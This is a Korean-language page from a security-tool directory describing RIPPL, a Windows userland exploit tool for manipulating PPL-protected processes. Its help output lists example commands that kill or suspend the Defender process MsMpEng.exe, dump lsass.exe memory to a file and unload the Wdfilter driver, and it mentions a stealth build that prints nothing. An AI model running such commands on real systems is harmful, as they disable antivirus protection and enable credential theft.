Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/last-byte/rippl
Privilege EscalationExploitationPost-ExploitationRed Teaming
GitHublast-byte/rippl

RIPPL

RIPPL은 Windows에서 PPL 프로세스를 조작하기 위해 usermode 전용 익스플로잇을 악용하는 도구입니다.

저장소 보기
7124년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RIPPL

드라이버를 사용하지 않고 PPL 보호 프로세스 조작하기

defender 웃긴

이 도구는 Windows PPL 보호 프로세스를 조작하기 위한 사용자 영역 익스플로잇을 구현합니다. 이 기술은 원래 James Forshaw(일명 @tiraniddo)와 Clément Labro(일명 @itm4n)가 다음 블로그 게시물에서 처음 논의했습니다.

  • James Forshaw의 블로그 게시물: Windows 익스플로잇 트릭
  • Clément Labro의 블로그 게시물 파트 #1: LSA 보호(RunAsPPL)에 대해 정말 알고 계십니까?
  • Clément Labro의 블로그 게시물 파트 #2: 사용자 영역에서 LSA 보호 우회하기

사용법

경고: 안전 버전의 바이너리는 절대 아무것도 출력하지 않습니다. 모든 문자열과 print 함수는 조건부 컴파일 매크로를 사용해 제거되기 때문입니다.

인자 없이 실행 파일을 실행하면 자세한 도움말/사용법이 표시됩니다(OPSEC 매크로를 정의하지 않고 컴파일된 바이너리에서만 유효).

root@kitploit:~
c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
도구 다운로드